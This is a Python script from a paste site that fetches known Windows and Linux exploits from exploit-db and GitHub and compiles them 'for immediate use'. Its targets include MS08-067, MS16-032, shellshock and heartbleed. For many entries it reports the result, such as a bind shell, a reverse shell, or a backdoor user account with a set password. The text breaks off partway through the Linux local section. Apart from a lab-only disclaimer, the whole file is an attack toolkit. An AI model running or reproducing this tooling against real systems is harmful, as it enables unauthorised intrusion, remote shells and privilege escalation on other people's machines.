SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | ||
3 | ################################################### | |
4 | # | |
5 | # XploitDeli - written by Justin Ohneiser | |
6 | # ------------------------------------------------ | |
7 | # This program produces a variety of exploits | |
8 | # found on exploit-db for immediate use. | |
9 | # | |
10 | # Note: options with an asterisk either don't work | |
11 | # or require compilation on the target. | |
12 | # | |
13 | # [Warning]: | |
14 | # This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use | |
15 | # I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the | |
16 | # functions may not produce the desired results so use at your own risk/discretion. I wrote this script to | |
17 | # target machines in a lab environment so please only use it against systems for which you have permission!! | |
18 | #------------------------------------------------------------------------------------------------------------- | |
19 | # [Modification, Distribution, and Attribution]: | |
20 | # You are free to modify and/or distribute this script as you wish. I only ask that you maintain original | |
21 | # author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's | |
22 | # worth anything anyway :) | |
23 | # | |
24 | # Designed for use in Kali Linux 4.6.0-kali1-686 | |
25 | ################################################### | |
26 | ||
27 | import sys, os, subprocess | |
28 | ||
29 | # ------------------------------------ | |
30 | # WINDOWS REMOTE | |
31 | # ------------------------------------ | |
32 | ||
33 | def windows_exploit_suggester(): | |
34 | commands = [ | |
35 | ('Downloading...','wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'), | |
36 | ('Upacking...','unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'), | |
37 | ('Updating...','./windows-exploit-suggester.py -u'), | |
38 | ('Cleaning up...','rm master.zip; rm -r Windows-Exploit-Suggester-master') | |
39 | ] | |
40 | if run(commands): | |
41 | printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]") | |
42 | ||
43 | def ms03_026(): | |
44 | commands = [ | |
45 | ('Downloading...','wget https://www.exploit-db.com/download/100 -O ms03-026.c'), | |
46 | ('Compiling...','i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'), | |
47 | ('Cleaning up...','rm ms03-026.c') | |
48 | ] | |
49 | if run(commands): | |
50 | printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'") | |
51 | ||
52 | def ms03_039_1(): | |
53 | commands = [ | |
54 | ('Downloading...','wget https://www.exploit-db.com/download/103 -O ms03-039.c'), | |
55 | ('Compiling...','i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'), | |
56 | ('Cleaning up...','rm ms03-039.c') | |
57 | ] | |
58 | if run(commands): | |
59 | printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'") | |
60 | ||
61 | def ms03_039_2(): | |
62 | commands = [ | |
63 | ('Downloading...','wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'), | |
64 | ('Compiling...','i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'), | |
65 | ('Cleaning up...','rm ms03-039.cpp') | |
66 | ] | |
67 | if run(commands): | |
68 | printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'") | |
69 | ||
70 | def ms03_049(): | |
71 | commands = [ | |
72 | ('Downloading...','wget https://www.exploit-db.com/download/119 -O ms03-049.c'), | |
73 | ('Compiling...','i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'), | |
74 | ('Cleaning up...','rm ms03-049.c') | |
75 | ] | |
76 | if run(commands): | |
77 | printGood("ms03-039.exe successfully created\n\t - spawns bind shell on port 5555") | |
78 | ||
79 | def ms04_007(): | |
80 | commands = [ | |
81 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'), | |
82 | ('Unpacking...','tar xvzf ms04-007.tar.gz'), | |
83 | ('Cleaning up...','rm ms04-007.tar.gz') | |
84 | ] | |
85 | if run(commands): | |
86 | printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721") | |
87 | ||
88 | def ms04_011_sslbof(): | |
89 | commands = [ | |
90 | ('Downloading...','wget https://www.exploit-db.com/download/275 -O ms04-011.c'), | |
91 | ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'), | |
92 | ('Cleaning up...','rm ms04-011.c') | |
93 | ] | |
94 | if run(commands): | |
95 | printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443") | |
96 | ||
97 | def ms04_011_lsasarv(): | |
98 | commands = [ | |
99 | ('Downloading...','wget https://www.exploit-db.com/download/295 -O ms04-011.c'), | |
100 | ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'), | |
101 | ('Cleaning up...','rm ms04-011.c') | |
102 | ] | |
103 | if run(commands): | |
104 | printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port") | |
105 | ||
106 | def ms04_031(): | |
107 | commands = [ | |
108 | ('Downloading...','wget https://www.exploit-db.com/download/734 -O ms04-031.c'), | |
109 | ('Compiling...','i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'), | |
110 | ('Cleaning up...','rm ms04-031.c') | |
111 | ] | |
112 | if run(commands): | |
113 | printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port") | |
114 | ||
115 | def ms05_017(): | |
116 | commands = [ | |
117 | ('Downloading...','wget https://www.exploit-db.com/download/1075 -O ms05-017.c'), | |
118 | ('Compiling...','i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'), | |
119 | ('Cleaning up...','rm ms05-017.c') | |
120 | ] | |
121 | if run(commands): | |
122 | printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port") | |
123 | ||
124 | def ms05_039(): | |
125 | commands = [ | |
126 | ('Downloading...','wget https://www.exploit-db.com/download/1149 -O ms05-039.c'), | |
127 | ('Compiling...','i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'), | |
128 | ('Cleaning up...','rm ms05-039.c') | |
129 | ] | |
130 | if run(commands): | |
131 | printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port") | |
132 | ||
133 | def ms06_040_1(): | |
134 | commands = [ | |
135 | ('Downloading...','wget https://www.exploit-db.com/download/2223 -O ms06-040.c'), | |
136 | ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'), | |
137 | ('Cleaning up...','rm ms06-040.c') | |
138 | ] | |
139 | if run(commands): | |
140 | printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321") | |
141 | ||
142 | def ms06_040_2(): | |
143 | commands = [ | |
144 | ('Downloading...','wget https://www.exploit-db.com/download/2265 -O ms06-040.c'), | |
145 | ('Fixing...',"sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"), | |
146 | ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'), | |
147 | ('Cleaning up...','rm ms06-040.c') | |
148 | ] | |
149 | if run(commands): | |
150 | printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444") | |
151 | ||
152 | def ms06_070(): | |
153 | commands = [ | |
154 | ('Downloading...','wget https://www.exploit-db.com/download/2789 -O ms06-070.c'), | |
155 | ('Fixing...',"sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"), | |
156 | ('Compiling...','i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'), | |
157 | ('Cleaning up...','rm ms06-070.c') | |
158 | ] | |
159 | if run(commands): | |
160 | printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444") | |
161 | ||
162 | def ms08_067_1(): | |
163 | commands = [ | |
164 | ('Downloading...','wget https://www.exploit-db.com/download/7104 -O ms08-067.c'), | |
165 | ('Compiling...','i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'), | |
166 | ('Cleaning up...','rm ms08-067.c') | |
167 | ] | |
168 | if run(commands): | |
169 | printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444") | |
170 | ||
171 | def ms08_067_2(): | |
172 | commands = [ | |
173 | ('Downloading...','wget https://www.exploit-db.com/download/7132 -O ms08-067.py'), | |
174 | ('Preparing...','chmod 744 ms08-067.py') | |
175 | ] | |
176 | if run(commands): | |
177 | printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444") | |
178 | ||
179 | def ms08_067_3(): | |
180 | commands = [ | |
181 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'), | |
182 | ('Unpacking...','mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'), | |
183 | ('Cleaning up...','rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067') | |
184 | ] | |
185 | if run(commands): | |
186 | printGood("ms08-067.exe successfully created\n\t") | |
187 | ||
188 | def ms09_050(): | |
189 | commands = [ | |
190 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'), | |
191 | ('Unpacking...','unzip ms09-050.zip'), | |
192 | ('Cleaning up...','rm ms09-050.zip'), | |
193 | ('Compiling...','cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32') | |
194 | ] | |
195 | if run(commands): | |
196 | printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876") | |
197 | ||
198 | exploits_windows_remote = [ | |
199 | ("windows_exploit_suggester" , windows_exploit_suggester), | |
200 | ("ms03-026" , ms03_026), | |
201 | ("ms03-039 (1)" , ms03_039_1), | |
202 | ("ms03-039 (2)" , ms03_039_2), | |
203 | ("*ms03-049" , ms03_049), | |
204 | ("ms04-007" , ms04_007), | |
205 | ("ms04-011 - ssl bof" , ms04_011_sslbof), | |
206 | ("ms04-011 - lsasarv.dll" , ms04_011_lsasarv), | |
207 | ("ms04-031" , ms04_031), | |
208 | ("ms05-017" , ms05_017), | |
209 | ("ms05-039" , ms05_039), | |
210 | ("*ms06-040 (1)" , ms06_040_1), | |
211 | ("ms06-040 (2)" , ms06_040_2), | |
212 | ("ms06-070" , ms06_070), | |
213 | ("*ms08-067 (1)" , ms08_067_1), | |
214 | ("ms08-067 (2)" , ms08_067_2), | |
215 | ("ms08-067 (3)" , ms08_067_3), | |
216 | ("*ms09-050" , ms09_050) | |
217 | ] | |
218 | ||
219 | # ------------------------------------ | |
220 | # WINDOWS LOCAL | |
221 | # ------------------------------------ | |
222 | ||
223 | def windows_privesc_check(): | |
224 | commands = [ | |
225 | ('Downloading...','wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'), | |
226 | ('Unpacking','unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'), | |
227 | ('Cleaning up...','rm windows-privesc-check.zip; rm -r windows-privesc-check-master') | |
228 | ] | |
229 | if run(commands): | |
230 | printGood("windows-privesc-check2.exe successfully created") | |
231 | ||
232 | def ms04_011_local(): | |
233 | commands = [ | |
234 | ('Downloading...','wget https://www.exploit-db.com/download/271 -O ms04-011.c'), | |
235 | ('Fixing...',"sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"), | |
236 | ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'), | |
237 | ('Cleaning up...','rm ms04-011.c') | |
238 | ] | |
239 | if run(commands): | |
240 | printGood("ms04-011.exe successfully created\n\t") | |
241 | ||
242 | def ms04_019_1(): | |
243 | commands = [ | |
244 | ('Downloading...','wget https://www.exploit-db.com/download/350 -O ms04-019.c'), | |
245 | ('Fixing...',"sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"), | |
246 | ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'), | |
247 | ('Cleaning up...','rm ms04-019.c') | |
248 | ] | |
249 | if run(commands): | |
250 | printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute") | |
251 | ||
252 | def ms04_019_2(): | |
253 | commands = [ | |
254 | ('Downloading...','wget https://www.exploit-db.com/download/352 -O ms04-019.c'), | |
255 | ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'), | |
256 | ('Cleaning up...','rm ms04-019.c') | |
257 | ] | |
258 | if run(commands): | |
259 | printGood("ms04-019.exe successfully created\n\t") | |
260 | ||
261 | def ms04_019_3(): | |
262 | commands = [ | |
263 | ('Downloading...','wget https://www.exploit-db.com/download/355 -O ms04-019.c'), | |
264 | ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'), | |
265 | ('Cleaning up...','rm ms04-019.c') | |
266 | ] | |
267 | if run(commands): | |
268 | printGood("ms04-019.exe successfully created\n\t") | |
269 | ||
270 | def ms04_020(): | |
271 | commands = [ | |
272 | ('Downloading...','wget https://www.exploit-db.com/download/351 -O ms04-020.c'), | |
273 | ('Fixing...',"sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"), | |
274 | ('Compiling...','i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'), | |
275 | ('Cleaning up...','rm ms04-020.c') | |
276 | ] | |
277 | if run(commands): | |
278 | printGood("ms04-020.exe successfully created\n\t") | |
279 | ||
280 | def keybd(): | |
281 | commands = [ | |
282 | ('Downloading...','wget https://www.exploit-db.com/download/1197 -O keybd.c'), | |
283 | ('Compiling...','i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'), | |
284 | ('Cleaning up...','rm keybd.c') | |
285 | ] | |
286 | if run(commands): | |
287 | printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>") | |
288 | ||
289 | def ms05_018(): | |
290 | commands = [ | |
291 | ('Downloading...','wget https://www.exploit-db.com/download/1198 -O ms05-018.c'), | |
292 | ('Compiling...','i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'), | |
293 | ('Cleaning up...','rm ms05-018.c') | |
294 | ] | |
295 | if run(commands): | |
296 | printGood("ms05-018.exe successfully created\n\t") | |
297 | ||
298 | def ms05_055(): | |
299 | commands = [ | |
300 | ('Downloading...','wget https://www.exploit-db.com/download/1407 -O ms05-055.c'), | |
301 | ('Compiling...','i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'), | |
302 | ('Cleaning up...','rm ms05-055.c') | |
303 | ] | |
304 | if run(commands): | |
305 | printGood("ms05-055.exe successfuly created\n\t") | |
306 | ||
307 | def ms06_030(): | |
308 | commands = [ | |
309 | ('Downloading...','wget https://www.exploit-db.com/download/1911 -O ms06-030.c'), | |
310 | ('Compiling...','i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'), | |
311 | ('Cleaning up...','rm ms06-030.c') | |
312 | ] | |
313 | if run(commands): | |
314 | printGood("ms06-030.exe successfully created\n\t") | |
315 | ||
316 | def ms06_049(): | |
317 | commands = [ | |
318 | ('Downloading...','wget https://www.exploit-db.com/download/2412 -O ms06-049.c'), | |
319 | ('Compiling...','i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'), | |
320 | ('Cleaning up...','rm ms06-049.c') | |
321 | ] | |
322 | if run(commands): | |
323 | printGood("ms06-049.exe successfully created\n\t") | |
324 | ||
325 | def spool(): | |
326 | commands = [ | |
327 | ('Downloading...','wget https://www.exploit-db.com/download/3220 -O spool.c'), | |
328 | ('Fixing...',"sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"), | |
329 | ('Compiling...','i686-w64-mingw32-gcc spool.c -o spool.exe'), | |
330 | ('Cleaning up...','rm spool.c') | |
331 | ] | |
332 | if run(commands): | |
333 | printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477") | |
334 | ||
335 | def ms08_025(): | |
336 | commands = [ | |
337 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'), | |
338 | ('Unpacking...','mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'), | |
339 | ('Compiling...','cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'), | |
340 | ('Cleaning up...','rm ms08-025.zip; rm -r ms08-025') | |
341 | ] | |
342 | if run(commands): | |
343 | printGood("ms08_025.exe successfully created\n\t") | |
344 | ||
345 | def netdde(): | |
346 | commands = [ | |
347 | ('Downloading...','wget https://www.exploit-db.com/download/21923 -O netdde.c'), | |
348 | ('Fixing...',"sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"), | |
349 | ('Compiling...','i686-w64-mingw32-gcc netdde.c -o netdde.exe'), | |
350 | ('Cleaning up...','rm netdde.c') | |
351 | ] | |
352 | if run(commands): | |
353 | printGood("netdde.exe successfully created\n\t") | |
354 | ||
355 | def ms10_015(): | |
356 | commands = [ | |
357 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'), | |
358 | ('Unpacking...','unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'), | |
359 | ('Cleaning up...','rm ms10-015.zip; rm -r KiTrap0D') | |
360 | ] | |
361 | if run(commands): | |
362 | printGood("ms10-015.exe successfully created\n\t") | |
363 | ||
364 | def ms10_059(): | |
365 | commands = [ | |
366 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'), | |
367 | ('Unpacking...','unzip ms10-059.zip'), | |
368 | ('Compiling...','cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'), | |
369 | ('Cleaning up...','rm ms10-059.zip; rm -r Chimichurri') | |
370 | ] | |
371 | if run(commands): | |
372 | printGood("ms10-059.exe successfully created\n\t") | |
373 | ||
374 | def ms10_092(): | |
375 | commands = [ | |
376 | ('Downloading...','wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'), | |
377 | ] | |
378 | if run(commands): | |
379 | printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute") | |
380 | ||
381 | def ms11_080(): | |
382 | commands = [ | |
383 | ('Downloading...','wget https://www.exploit-db.com/download/18176 -O ms11-080.py'), | |
384 | ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'), | |
385 | ('Cleaning up...','cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec') | |
386 | ] | |
387 | if run(commands): | |
388 | printGood("ms11_080.exe successfully created\n\t") | |
389 | ||
390 | def ms14_040(): | |
391 | commands = [ | |
392 | ('Downloading...','wget https://www.exploit-db.com/download/39525 -O ms14-040.py'), | |
393 | ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'), | |
394 | ('Cleaning up...','cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec') | |
395 | ] | |
396 | if run(commands): | |
397 | printGood("ms14-040.exe successfully created") | |
398 | ||
399 | def ms14_058_1(): | |
400 | commands = [ | |
401 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'), | |
402 | ('Unpacking...','unzip ms14-058.zip'), | |
403 | ('Compiling...','cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'), | |
404 | ('Cleaning up...','rm ms14-058.zip; rm -r 39666 __MACOSX') | |
405 | ] | |
406 | if run(commands): | |
407 | printGood("") | |
408 | ||
409 | def ms14_058_2(): | |
410 | commands = [ | |
411 | ('Downloading...','wget https://www.exploit-db.com/download/37064 -O ms14-058.py'), | |
412 | ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'), | |
413 | ('Cleaning up...','cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec') | |
414 | ] | |
415 | if run(commands): | |
416 | printGood("ms14-058.exe successfully created\n\t") | |
417 | ||
418 | def ms14_070_1(): | |
419 | commands = [ | |
420 | ('Downloading...','wget https://www.exploit-db.com/download/37755 -O ms14-070.c'), | |
421 | ('Compiling...','i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'), | |
422 | ('Cleaning up...','rm ms14-070.c') | |
423 | ] | |
424 | if run(commands): | |
425 | printGood("ms14-070.exe successfully created\n\t") | |
426 | ||
427 | def ms14_070_2(): | |
428 | commands = [ | |
429 | ('Downloading...','wget https://www.exploit-db.com/download/35936 -O ms14-070.py'), | |
430 | ('Note: requires manual fixing, then execute the following command:','echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\'') | |
431 | ] | |
432 | run(commands) | |
433 | ||
434 | def ms15_010_1(): | |
435 | commands = [ | |
436 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'), | |
437 | ('Unpacking...','unzip ms15_010.zip'), | |
438 | ('Fixing...',"cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"), | |
439 | ('Compiling...','cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'), | |
440 | ('Cleaning up...','rm ms15_010.zip; rm -r 39035') | |
441 | ] | |
442 | if run(commands): | |
443 | printGood("ms15-010.exe successfully created\n\t") | |
444 | ||
445 | def ms15_010_2(): | |
446 | commands = [ | |
447 | ('Downloading...','wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'), | |
448 | ('Fixing...','head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'), | |
449 | ('Compiling...','i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'), | |
450 | ('Cleaning up...','rm ms15-010.cpp') | |
451 | ] | |
452 | if run(commands): | |
453 | printGood("ms15-010.exe successfully created") | |
454 | ||
455 | def ms15_051(): | |
456 | commands = [ | |
457 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe') | |
458 | ] | |
459 | if run(commands): | |
460 | printGood("ms15-051_32.exe and ms15_051_64.exe successfully created") | |
461 | ||
462 | def ms16_014(): | |
463 | commands = [ | |
464 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'), | |
465 | ('Unpacking...','unzip ms16-014.zip'), | |
466 | ('Compiling...','cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'), | |
467 | ('Cleaning up...','rm -r ms16-014.zip __MACOSX') | |
468 | ] | |
469 | if run(commands): | |
470 | printGood("ms16-014.exe successfully created") | |
471 | ||
472 | def ms16_016(): | |
473 | commands = [ | |
474 | ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'), | |
475 | ('Unpacking...','unzip ms16-016.zip; cd 39788; unzip compiled.zip'), | |
476 | ('Cleaning up...','cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX') | |
477 | ] | |
478 | if run(commands): | |
479 | printGood("ms16_016.exe and Shellcode.dll successfully created") | |
480 | ||
481 | def ms16_032(): | |
482 | commands = [ | |
483 | ('Downloading...','wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1') | |
484 | ] | |
485 | if run(commands): | |
486 | printGood("ms16_032.ps1 successfully created\n\t - for use with powershell") | |
487 | ||
488 | exploits_windows_local = [ | |
489 | ("windows-privesc-check" , windows_privesc_check), | |
490 | ("ms04-011" , ms04_011_local), | |
491 | ("ms04-019 (1)" , ms04_019_1), | |
492 | ("ms04-019 (2)" , ms04_019_2), | |
493 | ("ms04-019 (3)" , ms04_019_3), | |
494 | ("ms04-020" , ms04_020), | |
495 | ("*keybd_event" , keybd), | |
496 | ("*ms05-018" , ms05_018), | |
497 | ("*ms05-055" , ms05_055), | |
498 | ("ms06-030" , ms06_030), | |
499 | ("ms06-049" , ms06_049), | |
500 | ("print spool service" , spool), | |
501 | ("*ms08-025" , ms08_025), | |
502 | ("netdde" , netdde), | |
503 | ("ms10-015" , ms10_015), | |
504 | ("ms10-059" , ms10_059), | |
505 | ("ms10-092" , ms10_092), | |
506 | ("ms11-080" , ms11_080), | |
507 | ("ms14-040" , ms14_040), | |
508 | ("*ms14-058 (1)" , ms14_058_1), | |
509 | ("ms14-058 (2)" , ms14_058_2), | |
510 | ("*ms14-070 (1)" , ms14_070_1), | |
511 | ("ms14-070 (2)" , ms14_070_2), | |
512 | ("*ms15-010 (1)" , ms15_010_1), | |
513 | ("*ms15-010 (2)" , ms15_010_2), | |
514 | ("ms15-051" , ms15_051), | |
515 | ("*ms16-014" , ms16_014), | |
516 | ("ms16-016" , ms16_016), | |
517 | ("ms16-032" , ms16_032) | |
518 | ] | |
519 | ||
520 | # ------------------------------------ | |
521 | # LINUX REMOTE | |
522 | # ------------------------------------ | |
523 | ||
524 | def shellshock(): | |
525 | commands = [ | |
526 | ('Downloading...','wget https://www.exploit-db.com/download/34900 -O shellshock.py'), | |
527 | ('Preparing...','chmod 744 shellshock.py') | |
528 | ] | |
529 | if run(commands): | |
530 | printGood("shellshock.py successfully created\n\t") | |
531 | ||
532 | def heartbleed(): | |
533 | commands = [ | |
534 | ('Downloading...','wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'), | |
535 | ('Compiling...','gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'), | |
536 | ('Cleaning up...','rm heartbleed.c') | |
537 | ] | |
538 | if run(commands): | |
539 | printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1") | |
540 | ||
541 | exploits_linux_remote = [ | |
542 | ("shellshock" , shellshock), | |
543 | ("heartbleed" , heartbleed) | |
544 | ] | |
545 | ||
546 | # ------------------------------------ | |
547 | # LINUX LOCAL | |
548 | # -- These should be compiled on target if possible | |
549 | # ------------------------------------ | |
550 | ||
551 | def linux_exploit_suggester(): | |
552 | commands = [ | |
553 | ('Downloading...','apt-get install linux-exploit-suggester'), | |
554 | ('Cleaning up...','cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl') | |
555 | ] | |
556 | if run(commands): | |
557 | printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>") | |
558 | ||
559 | def unix_privesc_check(): | |
560 | commands = [ | |
561 | ('Downloading...','wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'), | |
562 | ('Unpacking...','tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'), | |
563 | ('Cleaning up...','rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4') | |
564 | ] | |
565 | if run(commands): | |
566 | printGood("unix_privesc_check successfully created") | |
567 | ||
568 | def sendpage_1(): | |
569 | commands = [ | |
570 | ('Downloading...','wget https://www.exploit-db.com/download/9545 -O sendpage.c'), | |
571 | ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"') | |
572 | ] | |
573 | run(commands) | |
574 | ||
575 | def sendpage_2(): | |
576 | commands = [ | |
577 | ('Downloading...','wget https://www.exploit-db.com/download/9479 -O sendpage.c'), | |
578 | ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"') | |
579 | ] | |
580 | run(commands) | |
581 | ||
582 | def ftruncate(): | |
583 | commands = [ | |
584 | ('Downloading...','wget https://www.exploit-db.com/download/6851 -O ftruncate.c'), | |
585 | ('Compile with:','echo "gcc -o ftruncate ftruncate.c"'), | |
586 | ('Note: use in world-writable directory, located using the following command:','echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""') | |
587 | ] | |
588 | run(commands) | |
589 | ||
590 | def cap_sys_admin(): | |
591 | commands = [ | |
592 | ('Downloading...','wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'), | |
593 | ('Compile with:','echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"') | |
594 | ] | |
595 | run(commands) | |
596 | ||
597 | def compat(): | |
598 | commands = [ | |
599 | ('Downloading...','wget https://www.exploit-db.com/download/15024 -O compat.c'), | |
600 | ('Compile with:','echo "gcc -o compat compat.c"') | |
601 | ] | |
